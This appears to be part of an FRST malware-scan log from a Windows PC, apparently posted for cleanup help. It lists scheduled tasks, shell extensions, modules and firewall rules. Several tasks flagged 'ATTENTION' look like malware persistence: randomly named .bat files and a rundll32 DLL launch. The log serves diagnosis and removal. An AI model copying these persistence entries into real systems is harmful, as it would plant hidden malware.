CustomCLSID: HKU\S-1-5-21-1787623747-1286628437-3931833605-1001_Classes\CLSID\{724FE766-71C2-4E6E-8379-CD0EF5E51BDD}\InprocServer32 -> C:\Users\ouroboros\AppData\Local\Google\Update\1.3.28.17\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1787623747-1286628437-3931833605-1001_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\ouroboros\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1787623747-1286628437-3931833605-1001_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\ouroboros\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1787623747-1286628437-3931833605-1001_Classes\CLSID\{91A41FCC-BC02-42D8-A36E-0D27FF9BFFC8}\InprocServer32 -> C:\Users\ouroboros\AppData\Local\Google\Update\1.3.33.7\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1787623747-1286628437-3931833605-1001_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\ouroboros\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1787623747-1286628437-3931833605-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\ouroboros\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1787623747-1286628437-3931833605-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\ouroboros\AppData\Local\Google\Update\1.3.33.7\psuser_64.dll (Google Inc.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_B] -> {6D4133E5-0742-4ADC-8A8C-9303440F7191} => C:\Program Files (x86)\Common Files\AWS\2.2.2.524\ASUSWSShellExt64.dll [2015-04-22] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_O] -> {64174815-8D98-4CE6-8646-4C039977D809} => C:\Program Files (x86)\Common Files\AWS\2.2.2.524\ASUSWSShellExt64.dll [2015-04-22] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_U] -> {1C5AB7B1-0B38-4EC4-9093-7FD277E2AF4E} => C:\Program Files (x86)\Common Files\AWS\2.2.2.524\ASUSWSShellExt64.dll [2015-04-22] (ASUS Cloud Corporation.)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov)
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files\Notepad++\NppShell_06.dll [2017-03-08] ()
ContextMenuHandlers1: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\ShellExt.dll [2017-09-29] (Microsoft Corporation)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-01-21] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-01-21] (Alexander Roshal)
ContextMenuHandlers2: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\ShellExt.dll [2017-09-29] (Microsoft Corporation)
ContextMenuHandlers3: [BackupContextMenuExtension] -> {b1b96b20-da1d-4a3c-92c1-7229b32f2326} => C:\Windows\system32\mscoree.dll [2017-09-29] (Microsoft Corporation)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-11-01] (Malwarebytes)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov)
ContextMenuHandlers4: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\ShellExt.dll [2017-09-29] (Microsoft Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-12-16] (NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-11-01] (Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-01-21] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-01-21] (Alexander Roshal)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {01526271-4AF5-41E5-AAA2-91AC8730883B} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-12-16] (NVIDIA Corporation)
Task: {0276EF6C-596A-4009-B3DB-2D1F3B77477D} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1787623747-1286628437-3931833605-1001Core1d25850ca9ee9a0 => C:\Users\ouroboros\AppData\Local\Google\Update\GoogleUpdate.exe [2015-12-22] (Google Inc.)
Task: {03F790A5-0D1B-4062-A902-60A477FE2F1E} - System32\Tasks\DropboxOEM => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [2015-05-30] ()
Task: {077E5A99-5546-4F28-B89D-EBB337EC68C3} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1787623747-1286628437-3931833605-1001UA => C:\Users\ouroboros\AppData\Local\Google\Update\GoogleUpdate.exe [2015-12-22] (Google Inc.)
Task: {10910DF4-2930-4E0E-82C7-3774042C87B2} - System32\Tasks\ASUS Live Update2 => C:\Program Files (x86)\ASUS\ASUS Live Update\UpdateChecker.exe [2016-08-01] ()
Task: {15D126BE-EE3D-4685-B6AD-3BAD9CB19C8A} - System32\Tasks\RtHDVBg_ListenToDevice => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2016-05-26] (Realtek Semiconductor)
Task: {16BC19F1-0972-4AEB-B0A5-FD248773B648} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-09-27] (Adobe Systems Incorporated)
Task: {29DF41C2-260A-4843-9F84-0582F7D67A33} - System32\Tasks\Intel\Thunderbolt\Start Thunderbolt application when hardware is detected => Thunderbolt.exe
Task: {2C7F6B76-9D1D-44CD-BD7B-DE87A5BCA275} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [2017-12-19] (Microsoft Corporation)
Task: {3282642F-EAB2-48E3-B711-AC1DC1262BA9} - System32\Tasks\gxx speed launcher => C:\Program Files (x86)\Garena\Garena\Garena.exe [2017-12-14] (Garena Online )
Task: {35132BB3-FD69-4686-9C29-7A77261C4433} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-12-16] (NVIDIA Corporation)
Task: {398E9422-D9FF-47F4-B107-4FBA8DE168A9} - System32\Tasks\Update Checker => C:\Program Files (x86)\ASUS\ASUS Live Update\UpdateChecker.exe [2016-08-01] ()
Task: {48B249A3-CB93-4D76-8D88-A4914D3D63E1} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\MpCmdRun.exe [2017-12-07] (Microsoft Corporation)
Task: {4952CF65-ABCB-4BFE-B7E1-11278DD76895} - System32\Tasks\ROG Gaming Center => C:\Program Files (x86)\ASUS\ROG Gaming Center\ROGGamingKey.exe [2015-08-13] (ASUSTek Computer Inc.)
Task: {49BBE57F-CA9D-47A8-8B2C-BCEF4DC52899} - System32\Tasks\AdobeAAMUpdater-1.0-ENJAY-ouroboros => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2015-04-28] (Adobe Systems Incorporated)
Task: {4BDF7E76-D0B0-475B-A7F6-3247BC93E5ED} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\MpCmdRun.exe [2017-12-07] (Microsoft Corporation)
Task: {5373EE26-650E-4494-9A89-DBDE73772E14} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_28_0_0_126_pepper.exe [2017-12-14] (Adobe Systems Incorporated)
Task: {55A4A116-810E-4EB9-A283-07E1A4D4A39A} - System32\Tasks\aoIYY => C:\WINDOWS\aVPIeFZA.bat [2017-09-29] () <==== ATTENTION
Task: {5A0EBFE4-70EE-40FE-BFAE-96770200C8DC} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2017-12-19] (Microsoft Corporation)
Task: {5BF52A6A-7B40-41FA-BBB2-E91FC90C2640} - System32\Tasks\ASUS Smart Gesture Launcher => C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLauncher.exe [2015-08-18] (AsusTek)
Task: {5E6F53DA-A2BA-465F-BB25-AEBD1FE3C76C} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-12-16] (NVIDIA Corporation)
Task: {5EEFCC30-B7D9-4C61-8FE6-8EC80B1B3448} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-12-07] (Microsoft Corporation)
Task: {61B66AB0-E128-404B-B048-C2D3AECB222F} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [2017-12-19] (Microsoft Corporation)
Task: {636241A3-079A-4268-B91A-15A95F5272A8} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-12-14] (Adobe Systems Incorporated)
Task: {64A07B04-D21B-486D-A2CC-BECBA468593B} - System32\Tasks\ASUS Live Update1 => C:\Program Files (x86)\ASUS\ASUS Live Update\UpdateChecker.exe [2016-08-01] ()
Task: {6AFEEB9D-E977-4D4F-945F-B58706D58EA5} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {6BF1664A-9C55-4F53-AA2B-7A328CB86374} - System32\Tasks\ASUS\ASUS Product Register Service => C:\Program Files (x86)\ASUS\APRP\aprp.exe [2015-05-15] (ASUSTek Computer Inc.)
Task: {6F410B9E-DEC0-4BD4-95F4-D534071764F2} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-12-16] (NVIDIA Corporation)
Task: {7318097E-EEA3-45E5-BFFB-A5D4ADD83F88} - System32\Tasks\RfumFuaEoEEe => C:\Program Files (x86)\Common Files\CyIPiOCiIR.exe
Task: {77AE7A0E-9348-4CC4-BFE0-048A56AA8930} - System32\Tasks\WpsUpdateTask_ouroboros => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.4758\wtoolex\wpsupdate.exe [2015-12-21] (Zhuhai Kingsoft Office Software Co.,Ltd)
Task: {86818A98-AC23-44B6-BB61-AC16EC20799A} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1787623747-1286628437-3931833605-1001Core => C:\Users\ouroboros\AppData\Local\Google\Update\GoogleUpdate.exe [2015-12-22] (Google Inc.)
Task: {905CDEB9-785B-47FD-9F86-CBEC72887F6A} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2017-12-19] (Microsoft Corporation)
Task: {911D5428-90B3-4531-A294-C4CB7ADE6F28} - System32\Tasks\ASUS ROG Macro Key Listener => C:\Program Files (x86)\ASUS\ROG MacroKey\AsListen.exe [2015-08-12] (ASUS)
Task: {967AB1C0-E928-488C-B9B6-151D9B06E92A} - System32\Tasks\WpsNotifyTask_ouroboros => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.4758\wtoolex\wpsnotify.exe [2015-12-21] (Zhuhai Kingsoft Office Software Co.,Ltd)
Task: {9B352D76-756D-4808-B409-51E34EB2B0FF} - System32\Tasks\ATK Package A22126881260 => C:\Program Files (x86)\SplitmediaLabs\XSplit Gamecaster\XSplit.Gamecaster.exe [2015-08-05] (SplitmediaLabs)
Task: {9CA2C0D1-09A1-4A98-8FE2-ED0B0430B3FB} - System32\Tasks\Intel\Thunderbolt\Start Thunderbolt service when hardware is detected => sc.exe start ThunderboltService
Task: {A6B31F1B-96A3-4307-A365-96A4BF0E6531} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\MpCmdRun.exe [2017-12-07] (Microsoft Corporation)
Task: {AA44E743-DC30-46FD-830D-92AF8F18D213} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-12-07] (Microsoft Corporation)
Task: {ADDDC893-66F7-4C7F-A549-9E7F00364548} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-12-16] (NVIDIA Corporation)
Task: {B06EB407-984B-416E-BC49-D27A42D3E333} - \{6FEFFD84-0D29-0B78-4530-415A173AA131} -> No File <==== ATTENTION
Task: {B6832571-D883-4CC6-8493-21772C51A76B} - System32\Tasks\ASUS USB Charger Plus => C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe [2015-05-26] (ASUSTek Computer Inc.)
Task: {B7937A1E-D9E3-418A-BE24-FCAD9233ED54} - System32\Tasks\ATK Package 36D18D69AFC3 => C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\SimAppExec.exe [2015-03-11] (ASUSTek Computer Inc.)
Task: {BBEC4C2E-18EF-4C1A-AB04-9B574DF34E5E} - System32\Tasks\SS2svc64Run => C:\Program Files\ASUSTeKcomputer.Inc\SS2\UserInterface\x64\SS2svc64.exe [2015-08-15] ()
Task: {C0619711-DDB5-4844-B929-881F36A1C478} - System32\Tasks\ouroborosNobbleAbsorbsV2 => rundll32.exe NonrealisticPredefining.dll,main 7 1 <==== ATTENTION
Task: {C06E8482-AA9F-4398-B68B-5ED4B6A20BE7} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\MpCmdRun.exe [2017-12-07] (Microsoft Corporation)
Task: {CD4525D1-A007-4400-AB52-16535100A9ED} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-12-16] (NVIDIA Corporation)
Task: {D0EADF71-FA97-4ADE-A606-C27294C27102} - System32\Tasks\WpsNotifyTask_Administrator => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.4947\wtoolex\wpsnotify.exe
Task: {D5AB103A-8C84-4084-AAD3-A72F007ABC05} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2017-12-16] (NVIDIA Corporation)
Task: {D72EA3C5-389F-471C-9E8C-99DAD5F11C61} - System32\Tasks\Jasic => C:\Program Files (x86)\Common Files\rYms.bat [2017-09-29] () <==== ATTENTION
Task: {D7C80893-5758-4117-9BBA-09936DBD8BBA} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-12-16] (NVIDIA Corporation)
Task: {DB30FF0D-0C00-4B45-85E6-F323A2D50D9D} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [2016-05-26] (Realtek Semiconductor)
Task: {E1509710-0B3B-4C09-AEEE-598A6A38638E} - System32\Tasks\Intel\Thunderbolt\Start Thunderbolt service on boot if driver is up => tbtsvc.exe
Task: {E416FB5B-199F-4AB0-B5F3-7D0F62078880} - System32\Tasks\SS2svc32Run => C:\Program Files\ASUSTeKcomputer.Inc\SS2\UserInterface\SS2svc32.exe [2015-08-15] ()
Task: {E523299F-4091-4D73-9C1B-46399571E496} - System32\Tasks\ASUS Splendid ACMON => C:\Program Files (x86)\ASUS\Splendid\ACMON.exe [2015-08-26] (ASUS)
Task: {F208018C-7163-49EA-A9D0-FECE735F78D2} - System32\Tasks\WpsUpdateTask_Administrator => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.4947\wtoolex\wpsupdate.exe
Task: {F32A0984-B9DC-41B7-8FE3-6711EFB9B7A2} - System32\Tasks\SS2UILauncherRun => C:\Program Files\ASUSTeKcomputer.Inc\SS2\UserInterface\SS2UILauncher.exe [2015-08-15] ()
Task: {F4A4C59F-DFBE-458F-9A6C-23852DCD32F6} - System32\Tasks\Intel\Thunderbolt\Start Thunderbolt application on login if service is up => Thunderbolt.exe
Task: {F92A7233-CEE5-448D-97E7-652FEC88BD58} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1787623747-1286628437-3931833605-1001UA1d25850cac0e0a0 => C:\Users\ouroboros\AppData\Local\Google\Update\GoogleUpdate.exe [2015-12-22] (Google Inc.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1787623747-1286628437-3931833605-1001Core.job => C:\Users\ouroboros\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1787623747-1286628437-3931833605-1001UA.job => C:\Users\ouroboros\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\WpsNotifyTask_Administrator.job => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.4947\wtoolex\wpsnotify.exe
Task: C:\WINDOWS\Tasks\WpsNotifyTask_ouroboros.job => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.4758\wtoolex\wpsnotify.exe
Task: C:\WINDOWS\Tasks\WpsUpdateTask_Administrator.job => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.4947\wtoolex\wpsupdate.exe
Task: C:\WINDOWS\Tasks\WpsUpdateTask_ouroboros.job => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.4758\wtoolex\wpsupdate.exe
Task: C:\WINDOWS\Tasks\{447123AD-7416-1893-A863-7ED1A81B6B4D}.job => C:\Users\OUROBO~1\AppData\Local\447123~1\Sync.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\{6FEFFD84-0D29-0B78-4530-415A173AA131}.job => C:\Users\OUROBO~1\AppData\Local\Geburo\SYNCVE~1.EXE
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
 
ShortcutWithArgument: C:\Users\ouroboros\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\588bca4700aecad0\Montaro.lnk -> D:\Steam\steamapps\common\Montaro\nw.exe (The NWJS Community) -> --user-data-dir="C:\Users\ouroboros\AppData\Local\Montaro\User Data" --profile-directory=Default --app-id=pionmdlpdbkonlgpimjbaminkcbdgjnm
 
==================== Loaded Modules (Whitelisted) ==============
 
2017-09-29 21:41 - 2017-09-29 21:41 - 000184432 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2017-05-14 19:35 - 2017-12-16 08:23 - 001267136 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2015-05-20 01:11 - 2015-05-20 01:11 - 000007680 _____ () C:\Program Files (x86)\Intel\Intel® Security Assist\isaHelperService.exe
2018-01-03 14:45 - 2017-11-29 09:11 - 002301384 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll
2018-01-03 14:45 - 2017-11-29 09:11 - 002358728 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2015-12-17 18:38 - 2015-12-17 18:38 - 000085800 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-12-17 18:38 - 2015-12-17 18:38 - 001328912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2016-05-15 23:17 - 2017-12-19 08:16 - 008935088 _____ () C:\Program Files\Microsoft Office\root\Office16\1033\GrooveIntlResource.dll
2017-03-08 10:42 - 2017-03-08 10:42 - 000230064 _____ () C:\Program Files\Notepad++\NppShell_06.dll
2017-04-26 19:10 - 2015-05-27 06:33 - 001347264 ____N () C:\Program Files\Tablet\Wacom\libxml2.dll
2017-12-13 03:18 - 2017-11-26 20:23 - 011044864 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-12-13 03:18 - 2017-11-26 20:01 - 001804288 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2018-01-03 09:59 - 2018-01-03 10:02 - 000086528 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.13.257.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2018-01-03 09:59 - 2018-01-03 10:02 - 000195072 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.13.257.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2018-01-03 09:59 - 2018-01-03 10:03 - 024670720 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.13.257.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2018-01-03 09:59 - 2018-01-03 10:02 - 002550272 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.13.257.0_x64__kzf8qxf38zg5c\skypert.dll
2018-01-05 08:51 - 2018-01-03 17:20 - 002873688 _____ () C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\63.0.3239.132\swiftshader\libglesv2.dll
2018-01-05 08:51 - 2018-01-03 17:20 - 000137048 _____ () C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\63.0.3239.132\swiftshader\libegl.dll
2017-10-13 14:46 - 2017-10-13 14:46 - 000266424 _____ () C:\Program Files (x86)\Garena\Garena\2.0.1712.1422\libprotobuf-lite.dll
2017-12-14 23:04 - 2017-12-14 23:04 - 001442112 _____ () C:\Program Files (x86)\Garena\Garena\2.0.1712.1422\libs\gxx_pipe_engine.dll
2017-12-14 23:04 - 2017-12-14 23:04 - 002206528 _____ () C:\Program Files (x86)\Garena\Garena\2.0.1712.1422\libs\FSFileSytem.dll
2015-08-26 01:40 - 2015-08-26 01:40 - 000027648 _____ () C:\Program Files (x86)\ASUS\Splendid\DetectDisplayDC.dll
2015-08-26 01:40 - 2015-08-26 01:40 - 000124928 _____ () C:\Program Files (x86)\ASUS\Splendid\CCTAdjust.dll
2017-05-14 19:35 - 2017-12-16 08:23 - 001040320 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2015-09-19 15:34 - 2015-09-19 15:34 - 001243936 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\Software\Classes\regfile: regedit.exe "%1" <==== ATTENTION
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2015-07-10 19:04 - 2016-07-26 23:08 - 000000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\windows\img0.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
HKLM\...\StartupApproved\Run: => "SS2UILauncher"
HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run32: => "WebStorage"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager"
HKLM\...\StartupApproved\Run32: => "CancelAutoPlay_df"
HKLM\...\StartupApproved\Run32: => "CheckNDISPortF0ac46"
HKLM\...\StartupApproved\Run32: => "SwitchBoard"
HKLM\...\StartupApproved\Run32: => "Syncios device service"
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\StartupApproved\Run: => "CyberGhost"
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\StartupApproved\Run: => "Google Update"
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\StartupApproved\Run: => "GarenaPlus"
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\StartupApproved\Run: => "Chromium"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [UDP Query User{416F9B2D-79D4-4749-91A1-9A921BB648D9}D:\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) D:\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [TCP Query User{3E15C1B7-EADD-41BF-9EDD-277FE3B77EF1}D:\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) D:\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [{8F1BC006-A16E-4359-B0F2-FD1646DD28CF}] => (Allow) D:\Steam\steamapps\common\PUBG\TslGame\Binaries\Win64\TslGame_BE.exe
FirewallRules: [{DFCB4F00-3BC9-4E57-966E-78888AE82F18}] => (Allow) D:\Steam\steamapps\common\PUBG\TslGame\Binaries\Win64\TslGame_BE.exe
FirewallRules: [{5E48DA43-51D8-4DB3-BF64-331F11D5243D}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{F38F5757-98A4-489F-8F10-804186FA3F0C}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{9E5F33CB-417B-4BDF-B6A6-FC3DAF5DC49E}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{7E4F2F6A-ED44-4FA2-BAA7-992C9D283037}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{0D2B7B1C-BBC5-49B9-9EEE-6F7295AF2A75}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
